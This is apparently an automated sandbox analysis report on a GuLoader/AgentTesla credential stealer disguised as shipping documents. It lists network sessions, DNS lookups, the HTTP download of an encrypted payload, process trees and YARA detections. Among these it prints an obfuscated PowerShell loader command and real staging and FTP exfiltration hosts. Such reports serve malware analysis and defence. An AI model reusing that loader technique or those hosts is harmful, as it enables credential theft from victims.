Sep 25, 2024 16:00:08.072447062 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.072474957 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.072490931 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.072498083 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.072508097 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.072524071 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.072541952 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.072551012 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.072614908 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.073307037 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.073345900 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.073363066 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.073384047 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.073414087 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.073430061 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.073445082 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.073462009 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.073465109 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.073479891 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.073553085 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.074270964 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.074286938 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.074301958 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.074348927 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.074352026 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.074368954 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.074384928 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.074399948 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.074479103 CEST | 49720 | 80 | 192.168.2.6 | 185.29.11.53
Sep 25, 2024 16:00:08.139307976 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.139322996 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.139348030 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
Sep 25, 2024 16:00:08.139364004 CEST | 80 | 49720 | 185.29.11.53 | 192.168.2.6
                                      Sep 25, 2024 16:00:08.139378071 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.139401913 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.139417887 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.139440060 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.139563084 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.139647961 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.139662981 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.139689922 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.139704943 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.139718056 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.139723063 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.139781952 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.139934063 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.139997959 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.140007019 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.140014887 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.140032053 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.140099049 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.145642996 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.145658970 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.145673990 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.145715952 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.145734072 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.145760059 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.145782948 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.145798922 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.145817995 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.145833969 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.145843983 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.145905972 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.146132946 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.146158934 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.146199942 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.146202087 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.146226883 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.146243095 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.146286011 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.146363974 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.146413088 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.146429062 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.146454096 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.146469116 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.146486044 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.146498919 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.146589041 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.146708012 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.146783113 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.146785975 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.146797895 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.146822929 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.146836996 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.146852016 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.146867037 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.146868944 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.146884918 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.146972895 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.151839018 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.151889086 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.151904106 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.151947021 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.151956081 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.151962996 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.151978970 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.152024031 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.152089119 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.152107954 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.152148008 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.152163982 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.152179003 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.152194977 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.152219057 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.152240992 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.152318001 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.152431965 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.152446985 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.152463913 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.152481079 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.152494907 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.152498007 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.152510881 CEST8049720185.29.11.53192.168.2.6
                                      Sep 25, 2024 16:00:08.152585983 CEST4972080192.168.2.6185.29.11.53
                                      Sep 25, 2024 16:00:08.506402016 CEST49721443192.168.2.6104.26.13.205
                                      Sep 25, 2024 16:00:08.506498098 CEST44349721104.26.13.205192.168.2.6
                                      Sep 25, 2024 16:00:08.506572962 CEST49721443192.168.2.6104.26.13.205
                                      Sep 25, 2024 16:00:08.526599884 CEST49721443192.168.2.6104.26.13.205
                                      Sep 25, 2024 16:00:08.526633024 CEST44349721104.26.13.205192.168.2.6
                                      Sep 25, 2024 16:00:09.004230022 CEST44349721104.26.13.205192.168.2.6
                                      Sep 25, 2024 16:00:09.004317045 CEST49721443192.168.2.6104.26.13.205
                                      Sep 25, 2024 16:00:09.006454945 CEST49721443192.168.2.6104.26.13.205
                                      Sep 25, 2024 16:00:09.006484985 CEST44349721104.26.13.205192.168.2.6
                                      Sep 25, 2024 16:00:09.006731987 CEST44349721104.26.13.205192.168.2.6
                                      Sep 25, 2024 16:00:09.048409939 CEST49721443192.168.2.6104.26.13.205
                                      Sep 25, 2024 16:00:09.072299957 CEST49721443192.168.2.6104.26.13.205
                                      Sep 25, 2024 16:00:09.119396925 CEST44349721104.26.13.205192.168.2.6
                                      Sep 25, 2024 16:00:09.196199894 CEST44349721104.26.13.205192.168.2.6
                                      Sep 25, 2024 16:00:09.196245909 CEST44349721104.26.13.205192.168.2.6
                                      Sep 25, 2024 16:00:09.196366072 CEST49721443192.168.2.6104.26.13.205
                                      Sep 25, 2024 16:00:09.200490952 CEST49721443192.168.2.6104.26.13.205
                                      Sep 25, 2024 16:00:10.607628107 CEST4972221192.168.2.6192.185.13.234
                                      Sep 25, 2024 16:00:10.612454891 CEST2149722192.185.13.234192.168.2.6
                                      Sep 25, 2024 16:00:10.612524986 CEST4972221192.168.2.6192.185.13.234
                                      Sep 25, 2024 16:00:10.615166903 CEST4972221192.168.2.6192.185.13.234
                                      Sep 25, 2024 16:00:10.620038986 CEST2149722192.185.13.234192.168.2.6
                                      Sep 25, 2024 16:00:10.620094061 CEST4972221192.168.2.6192.185.13.234
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 25, 2024 16:00:08.488486052 CEST | 50360 | 53 | 192.168.2.6 | 1.1.1.1
Sep 25, 2024 16:00:08.496692896 CEST | 53 | 50360 | 1.1.1.1 | 192.168.2.6
Sep 25, 2024 16:00:10.289800882 CEST | 58636 | 53 | 192.168.2.6 | 1.1.1.1
Sep 25, 2024 16:00:10.605891943 CEST | 53 | 58636 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 25, 2024 16:00:08.488486052 CEST | 192.168.2.6 | 1.1.1.1 | 0xf2de | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Sep 25, 2024 16:00:10.289800882 CEST | 192.168.2.6 | 1.1.1.1 | 0x5671 | Standard query (0) | ftp.concaribe.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 25, 2024 16:00:08.496692896 CEST | 1.1.1.1 | 192.168.2.6 | 0xf2de | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 16:00:08.496692896 CEST | 1.1.1.1 | 192.168.2.6 | 0xf2de | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 16:00:08.496692896 CEST | 1.1.1.1 | 192.168.2.6 | 0xf2de | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 16:00:10.605891943 CEST | 1.1.1.1 | 192.168.2.6 | 0x5671 | No error (0) | ftp.concaribe.com | concaribe.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 16:00:10.605891943 CEST | 1.1.1.1 | 192.168.2.6 | 0x5671 | No error (0) | concaribe.com | | 192.185.13.234 | A (IP address) | IN (0x0001) | false
                                      • api.ipify.org
                                      • 185.29.11.53
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49720 | 185.29.11.53 | 80 | 4232 | C:\Program Files (x86)\Windows Mail\wabmig.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 16:00:07.100620031 CEST | 172 | OUT | GET /bgJJbKBK219.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: 185.29.11.53
                                      Cache-Control: no-cache
Sep 25, 2024 16:00:07.729650021 CEST | 1236 | IN | HTTP/1.1 200 OK
                                      Content-Type: application/octet-stream
                                      Last-Modified: Tue, 24 Sep 2024 22:11:29 GMT
                                      Accept-Ranges: bytes
                                      ETag: "b3ccbdb4ceedb1:0"
                                      Server: Microsoft-IIS/8.5
                                      Date: Wed, 25 Sep 2024 14:00:05 GMT
                                      Content-Length: 241728
                                      Data Raw: bb a1 07 e7 47 31 97 2f c7 92 21 83 72 74 d3 b1 24 84 a3 82 89 68 ad fa f8 7c dd 3e ad a7 b4 13 26 ad ff a6 db ad c2 5e b1 6c 71 e9 7c a6 c8 21 55 08 bd 78 8f 1a 25 84 75 f2 fa a4 b3 68 a7 d7 c8 0c ec 43 df 68 20 25 49 bb 97 6e a2 74 ac 90 cb ac 98 88 49 e7 55 82 f9 b3 d9 45 11 cd 7f 76 24 b4 7d c4 97 ed 1e 39 13 f8 db 1d 80 82 7e b3 36 a9 14 30 94 ed a8 07 e1 4a d9 0e 85 bc 9d 4c fd 27 94 08 c5 81 6f dc 97 7f 35 3c 0e d4 05 07 ad e4 8c c6 34 b0 f0 ae 19 c4 7a 34 9c fe 3b 66 40 31 5e 24 ae a3 01 f2 fd 5f 11 e4 d3 57 42 d2 f0 41 3e ab f2 66 bd 72 99 99 ee fc a4 a3 9f e6 ce 88 81 ea 9e 89 ff b2 87 82 df 54 77 e0 6b 72 4e 45 9e a1 df bf 48 54 04 a0 fd f3 de 4d be 91 bf 64 e6 95 f8 a0 e3 6e 4c 1c 62 f9 a6 8e 65 95 61 5c b2 60 b5 e9 30 66 40 7a 16 1b a1 05 79 10 f1 d5 b8 f8 32 84 e1 4c 82 2a 8f 3b fd 7a 6b fa 4e c5 07 a9 79 b1 b7 0b df f2 48 1b d7 ac 1c 0d 42 10 3d 32 56 1a 35 ac fd e6 c6 ce 3d 0c fa 19 e2 d5 52 0f 0b 6d 7a 52 54 5c 7b c8 3c 37 16 7b f0 52 c1 ad ff 03 11 ca 6c 2b ee 9a f1 6d b6 f6 92 ed [TRUNCATED]
                                      Data Ascii: G1/!rt$h|>&^lq|!Ux%uhCh %IntIUEv$}9~60JL'o5<4z4;f@1^$_WBA>frTwkrNEHTMdnLbea\`0f@zy2L*;zkNyHB=2V5=RmzRT\{<7{Rl+mvd!;OO^"Qj8VHxKSk?+JMCq#r@aKeXsC+]r,.g0YrDgn=9<,sviE5M UaG*1O.Q3iSB*pDwS^me1O`[\Db`^zPw(j?*4v=t~#:N]L(g<t[Cud^_6z`}h4CSJsE4f@HOCom*)h8\9N_2]"sIq4Z{U|_6*%bvv#^,Ng%@_clpc^]w@^Nm3^1O${YC&}5 %?$rkIigoz=rlzD[,LpnAr.hTX(l-j6?w.2h2mt-a>@}M<!ux60$nZ/Wv-JnVQ
Sep 25, 2024 16:00:07.729682922 CEST | 1236 | IN | Data Raw: b3 15 67 3c f0 20 48 e8 c7 4a 72 b1 ac 62 55 63 d6 3e f2 ff d5 24 e4 52 fb 17 02 9d 8b 72 c7 c5 f0 4e 9c f2 c8 f2 85 c1 d5 70 cb 68 cb d2 67 28 5a c2 be c7 0e ab e0 d6 0b 65 54 b1 ab cb 53 df f9 87 6b bf 0c 5c fc 84 6a 35 9e 1f 6b 9d 42 72 79 67
                                      Data Ascii: g< HJrbUc>$RrNphg(ZeTSk\j5kBrygqVAV|Ch!'NfUsZU1{1}H9Kz7`K{LEL1d94zi5~;W6jKA^5:ax]`qI2s4dD
Sep 25, 2024 16:00:07.729718924 CEST | 1236 | IN | Data Raw: 04 78 cc df 16 27 78 bd 9d c4 b6 a6 8b 8c e6 9e c7 83 98 c9 a8 fc c2 53 80 ff 32 71 ca 75 70 35 dd 9e a1 3b 95 68 57 0c dc 6e f3 de ef 97 db bd 44 f5 95 f8 aa e1 1c 25 f8 61 89 8e 43 65 95 67 96 af 62 ce 70 70 66 44 70 34 19 a2 7a e0 10 f5 d1 92
                                      Data Ascii: x'xS2qup5;hWnD%aCegbppfDp4z0L IXkfhH~Am2V=kR3zRRveG{`~l@tKI-Q%Q@ULPXQ:?+`SC[!q=c9Be([
Sep 25, 2024 16:00:07.729733944 CEST | 672 | IN | Data Raw: 4d 96 ab aa e2 43 ee f1 09 23 72 44 26 ed 8b 6d 42 f2 61 f4 80 d1 e8 f6 7a 99 cb c3 61 72 6d 9e af 64 43 2b 18 2f 94 7f a3 c7 41 e1 ef 0a 93 0a 87 97 03 fb f6 81 d8 da 15 f9 1e 7b fc 2c 2c 77 ef 8a 6a 5b 2e a9 af 39 46 32 e3 26 c1 a1 ee 76 6e a1
                                      Data Ascii: MC#rD&mBazarmdC+/A{,,wj[.9F2&vnpyELH;G+(QGwvmV5 -Z| ,NC^R*zFtuR\E3J,ZZFJ=bWrur|n,U1Vjj=(vv}^{P_7
Sep 25, 2024 16:00:07.729751110 CEST | 1236 | IN | Data Raw: 21 f9 03 e9 3b 71 57 93 e5 0c 5b fe 42 40 f3 62 04 1e 1a c0 60 ba 32 85 94 f3 4f d4 99 aa bc 2e e9 8f 4e 26 92 a1 09 21 25 49 b9 95 15 3c 8a ac 94 6b f4 49 f5 2b e6 55 86 bb b0 f1 6f 13 cd 75 0b 47 b5 7d c0 bd ed 1e 39 10 c8 d8 1d 75 82 7e b3 37
                                      Data Ascii: !;qW[B@b`2O.N&!%I<kI+UouG}9u~7!|L8.5f14p=hRKZWD4(tEq.^k|xi2krN?IUDjae`pf@"y8L*q5zkB
Sep 25, 2024 16:00:07.729763985 CEST | 224 | IN | Data Raw: 61 9c b0 60 b5 e9 0e 63 40 5a 12 69 a8 07 79 60 87 d8 b8 f8 42 eb f4 4c 86 20 2d c5 f1 7b 6b da 4c e5 03 a9 0b a2 b7 0b af 50 b6 17 d4 ac 7c 8b 42 10 2d 1a 40 0a 35 a6 03 e8 d4 ce c3 11 f8 19 90 c0 52 0f 6b 45 6d 52 54 56 d9 36 30 36 16 5b 60 97
                                      Data Ascii: a`c@Ziy`BL -{kLP|B-@5RkEmRTV606[``ih|!KIC^Q`JVaHkIK_;k5.JMkB#Laexr=.Pc,(]^Ug0X
Sep 25, 2024 16:00:07.811039925 CEST | 1236 | IN | Data Raw: ee 5a 52 bf d5 01 5a df cd 0a 10 6a 4a e8 ea 80 13 a5 aa 89 e6 39 3c ff 0c 2e 20 ed 73 65 15 e6 a9 9b 04 0a ba bd f0 10 bb e3 36 f2 df 90 4d c1 2a dd 96 55 21 a4 fe 0e dd 58 52 10 29 86 c6 5c ec 51 0f 0f ec 2e f5 02 96 80 7a 8e aa fb 9c a8 cd 70
                                      Data Ascii: ZRZjJ9<. se6M*U!XR)\Q.zpDQS[m%z1Nn^HBw]!Z2}QyejI*>,=T|#zm:N-zg65'>q[cqd^6btts5xIqzG}^CQCb6"H,
Sep 25, 2024 16:00:07.811064959 CEST | 1236 | IN | Data Raw: 88 d8 b7 7c 55 fa fe 73 3c 42 84 fc e9 48 bc 7f fd fa a5 03 c6 bc 6f 10 e4 dd b2 4e 18 2c b9 9e 39 b4 be 02 f9 a7 ad 07 bc 3b b3 bd e3 1b a9 39 22 16 57 85 06 33 25 75 4f 97 e5 cc 53 20 9e 6c 80 5b a8 12 0b 87 cb e7 49 6c 2a bf bb 5b 37 8b 47 95
                                      Data Ascii: |Us<BHoN,9;9"W3%uOS l[Il*[7GfRTcR"b3pyl1Q\n8oX8s'U`%gQ+ED9cGsb$W$azjzq=x,aoDL,aP.TXk\Ub
Sep 25, 2024 16:00:07.811081886 CEST | 448 | IN | Data Raw: 8d 44 ef a1 7b 23 c8 8b 4c fd 36 fc 04 40 a8 9e c4 2e 8c 6a 54 58 64 92 9b aa a6 5c 83 09 87 82 48 9b 1d de fd 67 97 42 f7 06 30 12 81 78 56 60 47 cf e2 ff c9 76 72 b4 9a ef f2 a9 bd f9 70 a3 e3 31 fd 3b 05 5f aa f3 28 93 e2 0e 95 7b 26 9d 4f 56
                                      Data Ascii: D{#L6@.jTXd\HgB0xV`Gvrp1;_({&OV+O.GwxV7o8,eo'y$GUgDx pRnpK.gWBG*YeJS?,q= $=)VBp %MEo]sI_ E3qu$
Sep 25, 2024 16:00:07.811098099 CEST | 1236 | IN | Data Raw: 1e e2 d5 56 7d 50 6f 7a 22 7c 41 7b c8 36 c9 18 7b 64 b7 d6 ad a8 03 ef c4 6f cb ed 64 bb 6b b6 d6 98 ed 76 64 5c 20 35 23 fc fc d4 f9 43 06 4f de 56 22 c1 51 9e 25 3a fa 26 30 31 b7 07 48 fd 26 f5 7b 4b c5 74 b9 50 a7 e3 15 bf 6b 9d c1 8b 12 c3
                                      Data Ascii: V}Poz"|A{6{dodkvd\ 5#COV"Q%:&01H&{KtPkJM}Cu#r2gf2fK=i[sC+e4gXC,(D2[_K\ZgNS?pEvIM?,u(XT ,W_3bjM)P
Sep 25, 2024 16:00:07.811114073 CEST | 1236 | IN | Data Raw: a0 a0 f9 55 25 a6 b0 04 dd 28 7c ae 20 86 cc ae 81 51 0f 7b b6 55 f6 02 ec 80 29 8c aa f7 c1 3b cd 70 40 05 95 94 53 71 93 1e f2 6d 2f 77 cc bb 31 4b 76 f1 59 f3 2c 6c c3 95 62 df 61 ea ba 60 5d 05 3b 9b 83 68 94 5e c7 7a e5 02 ab ac 97 c7 24 fd
                                      Data Ascii: U%(| Q{U);p@Sqm/w1KvY,lba`];h^z$#iw?hj3%*0M\?#:NY>PH$w[3}^-P5bv:Jq G<HGFsbH(~;YH7$3Ubf6][?{05k


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49721 | 104.26.13.205 | 443 | 4232 | C:\Program Files (x86)\Windows Mail\wabmig.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-25 14:00:09 UTC | 155 | OUT | GET / HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                      Host: api.ipify.org
                                      Connection: Keep-Alive
2024-09-25 14:00:09 UTC | 211 | IN | HTTP/1.1 200 OK
                                      Date: Wed, 25 Sep 2024 14:00:09 GMT
                                      Content-Type: text/plain
                                      Content-Length: 11
                                      Connection: close
                                      Vary: Origin
                                      CF-Cache-Status: DYNAMIC
                                      Server: cloudflare
                                      CF-RAY: 8c8b89f108514345-EWR
2024-09-25 14:00:09 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                      Data Ascii: 8.46.123.33


                                      Target ID:0
                                      Start time:09:59:02
                                      Start date:25/09/2024
                                      Path:C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"
                                      Imagebase:0x400000
                                      File size:729'960 bytes
                                      MD5 hash:4ECAFA8F623606CAF0A925F5C6B2EB10
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:09:59:03
                                      Start date:25/09/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"powershell.exe" -windowstyle minimized "$Nanometre76=Get-Content 'C:\Users\user\AppData\Local\acneform\Baroco\Tarsometatarsal.Pla';$Hulhedernes=$Nanometre76.SubString(27962,3);.$Hulhedernes($Nanometre76)"
                                      Imagebase:0x780000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2780799795.00000000094D7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:09:59:03
                                      Start date:25/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff66e660000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:8
                                      Start time:09:59:54
                                      Start date:25/09/2024
                                      Path:C:\Program Files (x86)\Windows Mail\wabmig.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\windows mail\wabmig.exe"
                                      Imagebase:0x870000
                                      File size:66'048 bytes
                                      MD5 hash:BBC90B164F1D84DEDC1DC30F290EC5F6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3394310610.00000000241CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3394310610.00000000241A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3394310610.00000000241A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.3376516352.0000000004687000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:moderate
                                      Has exited:false


                                        Execution Graph

                                        Execution Coverage:25.3%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:20.3%
                                        Total number of Nodes:1466
                                        Total number of Limit Nodes:48
execution_graph
